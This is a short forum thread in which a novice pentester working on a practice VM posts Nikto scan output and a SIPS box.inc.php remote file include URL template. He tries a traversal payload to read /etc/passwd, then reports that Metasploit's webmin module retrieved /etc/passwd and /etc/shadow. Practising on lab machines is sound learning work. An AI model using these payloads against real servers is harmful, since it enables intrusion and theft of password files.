Results 1 to 2 of 2

Thread: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability - how to exploit?

Hybrid View

  1. #1
    Junior Member
    Join Date
    Apr 2010
    Location
    Sweden
    Posts
    35

    Default SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability - how to exploit?

    Hello,

    I'm rather new to the pen test scene. I'm just playing around with PwnOS and Backtrack 4 right now. I did a Nikto scan and got this information:

    Code:
    root@bt:/pentest/scanners/nikto# perl nikto.pl -h 192.168.3.4 -p 10000
    - Nikto v2.1.0
    ---------------------------------------------------------------------------
    + Target IP:          192.168.3.4
    + Target Hostname:    192.168.3.4
    + Target Port:        10000
    + Start Time:         2010-04-26 15:16:44
    ---------------------------------------------------------------------------
    + Server: MiniServ/0.01
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + OSVDB-0: DEBUG HTTP verb may show server debugging information
    + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
    + OSVDB-0: MiniServ - This is the Webmin Unix administrator. It should not be running unless required.
    + OSVDB-0: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
    + OSVDB-0: /ht_root/wwwroot/-/local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
    + OSVDB-0: /local/httpd$map.conf: WASD reveals the http configuration file. Upgrade to a later version and secure according to the documents on the WASD web site.
    + OSVDB-0: /..\..\..\..\..\..\temp\temp.class: Cisco ACS 2.6.x and 3.0.1 (build 40) allows authenticated remote users to retrieve any file from the system. Upgrade to the latest version.
    + OSVDB-6659: /icH6vqwwEtEVJ2XIyFC3AYHAu8dY0Y6YbrqhSXwsa4DE8ZXayf68tlelLTHZkYzb5hJhoeWmEuFjOTTP8fdDHrIHJ2NXk0a16oa9KHvEGYXqFMJ94eeQGxGbLnq2UfvAzeIh2XCRAoHnUza4Lw5MPMvs3EtLRdMIJcK4tmgcXFUtkgMmi2fMIEqFgPBQ0a4UsANg39e0crlYIoOCPVCQwbfyeOd8ZRv<font%20size=50>DEFACED<!--//--: MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.
    + 3588 items checked: 8 item(s) reported on remote host
    + End Time:           2010-04-26 15:21:16 (272 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
    Anyway, I thought this would be a good thing to exploit (SIPS v0.2.2 allows user account info (including password) to be retrieved remotely). Trouble is that I don't really understand how to execute the exploit. I've looked at some RFI tutorials but I've had no success on the target machine.

    I found this in an exploit db:

    Code:
    http://[target]/[path]/sipssys/code/box.inc.php?config[sipssys]=[SHELL]
    SIPS <= 0.3.1 (box.inc.php) Remote File Include Vulnerability

    So for me that url should transform into:I've found out that the I should be able to replace [SHELL] with the remote command I want to execute on the server. Like ../../../../../../../../etc/passwd%00 in order to view the password file.

    Code:
    http://192.168.3.4:10000/sipssys/cod...inc.php?config[sipssys]=../../../../../../../../etc/passwd%00
    So, that's where I am now. Later on when I get this to work I'll try and make it execute a script, on my attack machine, granting me shell access on the server.

    My questions regards this part: config[sipssys]... What should I replace [sipssys] with? I guess that's the thing I'm missing here.

  2. #2
    Junior Member
    Join Date
    Apr 2010
    Location
    Sweden
    Posts
    35

    Default Re: SIPS <= 0.3.1(box.inc.php) Remote File Include Vulnerability - how to exploit?

    I just fired up Metasploit and ran a search for webmin. I used the auxilary there in order to retrieve the /etc/passwd & /etc/shadow file. So simple. Consider this one solved.

Similar Threads

  1. www.remote-exploit.org is down?
    By aliljet in forum OLD Newbie Area
    Replies: 4
    Last Post: 12-04-2007, 05:26 AM
  2. How to patch Remote File Include
    By Mister0 in forum OLD Pentesting
    Replies: 3
    Last Post: 10-26-2007, 07:47 AM
  3. remote exploit bug
    By vreezver in forum OLD Pentesting
    Replies: 14
    Last Post: 10-20-2007, 06:45 PM
  4. Cisco IOS vulnerability exploit?
    By -~operator~- in forum OLD Pentesting
    Replies: 1
    Last Post: 06-26-2007, 06:27 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •